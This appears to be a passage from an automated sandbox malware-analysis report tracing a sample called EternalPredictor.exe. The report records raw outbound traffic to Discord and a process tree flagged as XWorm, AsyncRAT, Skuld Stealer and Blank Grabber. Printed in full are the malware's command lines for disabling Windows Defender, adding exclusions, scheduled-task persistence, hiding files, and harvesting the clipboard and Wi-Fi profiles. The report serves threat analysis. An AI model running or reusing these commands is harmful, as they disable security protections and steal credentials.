                                                                                                                                                                                                                                2024-11-17 10:22:00 UTC16384OUTData Raw: b3 6b eb 20 25 d9 64 43 9d e0 72 cb a5 e9 23 50 33 c9 5c 3b 79 fb ba 3b 0c 3d 35 32 9e 45 22 6f ab 6a 64 1f c1 70 84 9c 33 b8 a8 d9 b2 52 9a 7e 58 68 e3 ab 7a 8b 83 79 d6 d4 27 3d 5d 31 63 d9 d0 f9 42 b2 c1 d6 54 c6 52 dc 12 ce 7a fb 85 20 f4 6c 13 ae 9b 2b 7b a1 9a 40 7b 1e ec 11 78 bb d4 42 6b f5 7e 4e 34 56 4a da 79 5a 2e a0 70 c3 97 8b 40 d4 d2 4e 53 b7 c2 c0 44 91 e7 e8 98 38 2b f3 ff e9 6b 53 75 85 c1 48 d5 eb 3f ee 3a 87 69 14 49 cf 1e d5 7b d4 7d f7 cd 4d 99 bb b5 19 3b 52 1c fc 96 97 32 ed c4 21 23 13 29 c2 c9 92 14 e8 3f 58 dc f8 f5 20 58 76 c3 46 74 79 26 2f 60 0e c5 ff 2c 98 1c 2b 9c ca 72 88 ab ff c5 1e f0 91 bf e9 21 e9 31 6c 33 c1 65 fe 3d 04 c9 2b f5 5b c9 98 93 62 3d 78 ab e6 40 77 da a0 cc 3c 93 9a 38 81 58 4b a4 ca 24 29 8a f8 7b b2 cb
                                                                                                                                                                                                                                Data Ascii: k %dCr#P3\;y;=52E"ojdp3R~Xhzy'=]1cBTRz l+{@{xBk~N4VJyZ.p@NSD8+kSuH?:iI{}M;R2!#)?X XvFty&/`,+r!1l3e=+[b=x@w<8XK$){
                                                                                                                                                                                                                                2024-11-17 10:22:00 UTC16384OUTData Raw: ec 24 31 89 3a 88 43 b1 1b ba b5 c7 81 2f 2d 5f 70 06 62 27 a7 d1 64 14 a3 4c b1 a9 b2 31 be 0a 85 11 5b 45 a0 01 f4 54 33 90 b1 2c d3 ec 5c de 82 04 07 e6 7b 57 3c 88 50 56 c0 61 86 1f 29 58 23 d8 b2 09 8a 74 b0 65 70 14 72 8f e4 4e 9d c8 17 d7 95 1e 18 fb 82 11 44 5b 15 84 94 23 5e 61 94 c4 b8 39 4c 4b 14 6b 18 a4 c3 ad ee 3e 71 02 09 f5 5d 5e e0 2c 16 f2 be 81 f4 e4 9f c6 eb 16 1e 6b 5f 3c 1a 04 5b f4 c7 5e cd 40 b5 47 3d 0c a6 1c 6a e8 ed ee 60 3e 83 38 a1 8f ec 1d 48 f0 51 59 22 3a bc 18 1f ce 53 51 90 08 94 0f 5f 14 d7 89 54 67 02 7f 67 fc 6c a6 91 34 b7 b4 14 63 24 e9 be cd 53 13 6e 84 98 5f e9 53 51 b3 78 a8 e4 26 14 71 07 08 12 28 d4 00 60 b1 3a da 5f 76 10 3a 1e 73 94 82 46 5c e7 42 c1 12 97 08 11 a1 05 f8 44 61 b7 af 5b 58 ac e1 62 fb 0d cd c7
                                                                                                                                                                                                                                Data Ascii: $1:C/-_pb'dL1[ET3,\{W<PVa)X#teprND[#^a9LKk>q]^,k_<[^@G=j`>8HQY":SQ_Tggl4c$Sn_SQx&q(`:_v:sF\BDa[Xb
2024-11-17 10:22:01 UTC 1253 IN HTTP/1.1 404 Not Found
Date: Sun, 17 Nov 2024 10:22:01 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1731838922
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAafSwTRG6Fa%2FRJMOc3VGX0BCuXUtuULCwhFeDvjsJPZAKtziv3qP5ItX77L8Jqhu6pfvcjLVPS5rCQSNjrBh6haKFe%2BMITwUEfsxI6na0mnEuRFO4eXHDTPXwff"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=daade001e76c5346a9107562c463e493fd63bfc9-1731838921; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=ycNd0d26ksQwnFyG4f9aiNkPKG6_UonCz4_PyaZrPZI-1731838921537-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8e3eff479fd14623-DFW


Target ID:0
Start time:05:21:10
Start date:17/11/2024
Path:C:\Users\user\Desktop\EternalPredictor.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\EternalPredictor.exe"
Imagebase:0x7f0000
File size:18'412'032 bytes
MD5 hash:7D207C243B33D6F3D78ACADFFD95AE0E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:low
Has exited:true

Target ID:2
Start time:05:21:17
Start date:17/11/2024
Path:C:\Users\user\AppData\Roaming\eternal.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\eternal.exe"
Imagebase:0xbc0000
File size:71'168 bytes
MD5 hash:7439CC991A9A756C41153B8E9121BAAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\eternal.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\eternal.exe, Author: ditekSHen
Antivirus matches:
• Detection: 74%, ReversingLabs
Reputation:low
Has exited:true

Target ID:3
Start time:05:21:17
Start date:17/11/2024
Path:C:\Users\user\AppData\Roaming\skuld.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\skuld.exe"
Imagebase:0xcf0000
File size:10'375'680 bytes
MD5 hash:DBBD2127D1030E4C9548FDF7DE9983A7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\skuld.exe, Author: Joe Security
• Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\skuld.exe, Author: Joe Security
Antivirus matches:
• Detection: 63%, ReversingLabs
Reputation:low
Has exited:true

Target ID:4
Start time:05:21:18
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:05:21:18
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\program.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff72c650000
                                                                                                                                                                                                                                File size:7'954'796 bytes
                                                                                                                                                                                                                                MD5 hash:3E6865657B29FAEA3A355C710F0AAD45
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.1524758278.00000139887E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.1524758278.00000139887E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:05:21:19
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:attrib +h +s C:\Users\user\AppData\Roaming\skuld.exe
                                                                                                                                                                                                                                Imagebase:0x7ff7cb090000
                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:05:21:19
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                                                                                                                Imagebase:0x7ff7cb090000
                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:05:21:20
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\program.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff72c650000
                                                                                                                                                                                                                                File size:7'954'796 bytes
                                                                                                                                                                                                                                MD5 hash:3E6865657B29FAEA3A355C710F0AAD45
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1934849918.00000237A5ED6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:05:21:20
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:wmic csproduct get UUID
                                                                                                                                                                                                                                Imagebase:0x7ff781d20000
                                                                                                                                                                                                                                File size:576'000 bytes
                                                                                                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:05:21:22
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff770490000
                                                                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:05:21:22
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
Has exited:true

Target ID:12
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:16
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
Imagebase:0x7ff6cb6b0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:0x7ff6cb6b0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:05:21:23
Start date:17/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Imagebase:0x7ff6cb6b0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:05:21:24
Start date:17/11/2024
Path:C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Roaming\XClient.exe
Imagebase:0xc00000
File size:71'168 bytes
MD5 hash:7439CC991A9A756C41153B8E9121BAAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Antivirus matches:
• Detection: 74%, ReversingLabs
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                Imagebase:0x7ff7cb010000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                Imagebase:0x7ff7cb010000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:05:21:26
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:05:21:26
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:05:21:26
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:0x7ff781d20000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
